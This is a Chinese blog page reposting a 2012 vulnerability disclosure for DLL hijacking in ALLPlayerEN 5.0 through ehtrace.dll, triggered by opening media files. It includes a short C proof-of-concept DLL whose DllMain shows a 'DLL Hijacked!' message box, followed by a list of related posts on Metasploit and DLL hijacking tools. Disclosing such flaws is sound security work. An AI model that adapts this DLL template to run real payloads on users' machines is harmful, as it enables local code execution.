ALLPlayerEN 5.0 ehtrace.dll dll hijack Vulnerability

最新推荐文章于 2023-08-16 22:56:56 发布
最新推荐文章于 2023-08-16 22:56:56 发布
阅读量574 收藏
点赞数
分类专栏: 漏洞挖掘 文章标签: dll winapi thread
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/instruder/article/details/7396893
版权 

/*


Exploit Title: ALLPlayerEN 5.0 ehtrace.dll dll hijack Vulnerability

Date: 2012-3-25
Author: instruder
Software Link: http://www.allplayer.org/zh/download/allplayer
Version: ALLPlayerEN 5.0
Tested on: win7
CVE : N/A



Desc: ALLPlayer Classic suffers from a dll hijacking vulnerability
that enables the attacker to execute arbitrary code on a local
level. The vulnerable extensions are .mp3, .rmvb .avi and so on thru
ehtrace.dll
library

Vulnerability discovered by instruder have for fun.


*/

#include <windows.h>

BOOL WINAPI DllMain (HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{

switch (fdwReason)
{
case DLL_PROCESS_ATTACH:
dll_mll();
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}

return TRUE;
}

int dll_mll()
{
MessageBox(0, "DLL Hijacked!", "DLL Message", MB_OK);
}


instruder
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
渗透攻击基础
weixin_30834019的博客
07-14 4510
Metasploit框架中包涵数百个模块,没有人能用脑子把它们的名字全部记下来。在MSF终端中运行show命令会把所有的模块显示出来,也可以指定模块的类型来缩小搜索范围。 1. msf > show exploits Exploits ======== Name ...
电影播放器(AllPlayer) v8.4 官方多语版.exe
07-09
ALLPlayer是一个独特不同的电影播放软件,支持多种格式,以及许多独特功能,如双屏幕互录功能、双屏幕展成全屏幕播放、比Windows Media Player更强大的解码器侦测/下载功能,也能制作字幕并且能自行依照影片演进速度和字数自动加以调节显示速度,配合人的观看习惯。
AllPlayer v8.2.zip
07-08
今天小编要给大家介绍一款简单独特的影片播放软件——ALLPlayer。ALLPlayer支持多种视频格式,比Windows Media Player更强大的解独特功能码器侦测/下载功能,更具有双屏幕互录功能、双屏幕展成全屏幕播、放制作字幕并且能自行依照影片演进速度和字数自动加以调节显示速度等独特功能。是用户实现影片播放功能的好帮手。需要的朋友快来下载吧! ALLPlayer功能 支持多种格式,以及许多独特功能,如双屏幕互录功能、双屏幕展成全屏幕播放、比Windows Media Player更强大的解码器侦测/下载功能,也能制作字幕并且能自行依照影片演进速度和字数自动加以调节显示速度,配合人的观看习惯。 ALLPlayer标准特性 ALLContainer——电影评论,封面,字幕都在一个文件中。 快照——拍照的电影(照片)- F12键。 选择重新定义键盘。 自动关机后看电影。 自动断开后的监控看电影。 AutoResume——继续看电影从这一点,我们完成了。 逐帧浏览。 能够演奏电影作为一个桌面背景。 可能改变播放速度从0.1 x - 2 ALLPlayer截图
Smplayer播放wmv视频文件
Forey Special Column
08-31 7953
安装完的Smplayer的GUI的界面程序,可以播放FLV、AVI、Rmvb、MP4以及rm格式的文件,但是还不能播放WMV格式的视频文件,   同时我们在上一次安装的时候,我们同时利用下面的命令安装了mplayer的rpm包,但是没有安装GUI界面。   yum install mplayer  smplayer  1、安装mplayer的图形界面            我们在终端
Kali linux 2016.2(Rolling)中的Exploits模块详解
weixin_30772105的博客
05-22 4178
  简单来将,这个Exploits模块,就是针对不同的已知漏洞的利用程序。 root@kali:~# msfconsole Unable to handle kernel NULL pointer dereference at virtual addre...
msf-show
weixin_30548917的博客
01-15 3010
Metasploit框架中包涵数百个模块,没有人能用脑子把它们的名字全部记下来。在MSF终端中运行show命令会把所有的模块显示出来,也可以指定模块的类型来缩小搜索范围。 1. msf > show exploits Exploits ======== Name ...
工作中使用到的单词(软件开发)_2023_0316备份
sun0322
03-16 1万+
目录■Java学习汇总■常用链接■2020/03/15 (最初整理 242个单词)2020 6/28 整理2020 6/29 整理2020 7/6 整理■2020 7/23 整理■2020/10/07 以降整理■2020/11/02 以降整理■2020/12/04 以降整理■2020/12/14以降整理■2021/01/01以降整理■2021/02/22以降整理■匿名内部类,lambda表达式,JDK7新特性,等等java相关■2021/03/18以降整理Linux系统性能 相关■其他各种单词,知识(l
NISP一级练习题1-10
最新发布
weixin_43263566的博客
08-16 7959
A. 在一定程度上,人类社会的发展速度取决于人们感知信息、利用信息的广度和深度B. 信息无时不在,无处不在,信息是我们行动决策的重要依据C. 电视机、电话机、声波、光波是信息D. 人类可以借助信息资源对自然界中的物质资源和能量资源进行有效地获取和利用解析:电视机、电话机、声波、光波不属于信息A. 维持与改进B.维持与报告C.报告与监督D.监督与报告。
Notes Twenty one days-渗透攻击-红队-权限提升
热门推荐
qq_34801745的博客
10-07 1万+
** Notes Twentieth Day-渗透攻击-红队-权限提升(dayu) ** 作者:大余 时间:2020-10-5 请注意:对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。 我必须再重申一遍:务必不要做未授权测试!不要未经授权在真实网络环境中复现任何本书中描述的攻击。即使是出于好奇而不是恶意,你仍然会因未授权测试行为而陷入很多麻烦。为了个人能更
HID用于劫持系统模块HID.DLL 可做辅助修改内存等
06-11
http://www.pudn.com/Download/item/id/3755022.html;用于劫持系统模块HID.DLL 可做辅助修改内存等 (Used to hijack the system module HID.DLL can be used to modify the memory, etc.)
vscode-portable:使用dll-hijack使Visual Studio代码可移植
05-22
将version.dll放在Code.exe的同一文件夹中。 编译 要求:git,cmake,mingw gcc,忍者。 运行build.sh或执行以下步骤: git clone https://github.com/myfreeer/vscode-portable.git cd vscode-portable mkdir ...
Activity_Hijack.apk
04-19
用途:该工具主要用于APP劫持检测。 使用方法:安装HijackActivity.apk,使用 activity 界面劫持工具,在工具中指定要劫持的应用进程名称。...打开应用,测试工具会尝试用自己的窗口覆盖被测的应用,如果劫持成功,会...
DLL Hijack Auditor 3.5(DLL劫持检测)汉化版.rar
09-04
DLL Hijack Auditor能够检测你的应用程序是否被劫持,一些恶意程序为了达到某一目的,会劫持软件的DLL动态库文件,这款Dll Hijack Auditor工具来实现防止劫持的目的,它可以一键检测Dll文件是否被劫持,哪些被...
orsimple.dll
09-11
很好的注入工具hijack工具,对初学者很有用
Windows network services internals 1
08-23 3744
 Jean-Baptiste MarchandJean-Baptiste.Marchand@hsc.frCopyright Hervé Schauer Consultants 2003Table of Contents1 Introduction2 TCIP/IP stack2.1 General architecture2.2 No privileged ports2.3 Dynam
metasploit使用辅助模块
天元喜羊羊的博客
05-15 1万+
显示所有的辅助模块: msf > show auxiliary Auxiliary ========= Name Disclosure Date Rank Description ----
肉眼挖啊挖
爱杀之爪的矩阵
04-04 1530
蛋疼 待验证 .text:1000C855 cycle_big: ; CODE XREF: sus_sub_1000C520+3D2j .text:1000C855 push 1 .text:1000C857 mov ecx, ebx .text:1000
CVE-2013-0636
爱杀之爪的矩阵
02-18 1422
http://www.adobe.com/support/security/bulletins/apsb13-06.html
call_queue.py,img2img.py,processing.py,batch_hijack.py,processing.py,Image.py错误最可能在哪个文件中
07-15
1. batch_hijack.py:这个文件可能包含与批处理操作相关的错误。你可以检查这个文件中的代码,特别是与处理批量数据相关的部分。 2. Image.py:这个文件可能包含与图像处理相关的错误。你可以检查这个文件中的代码...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值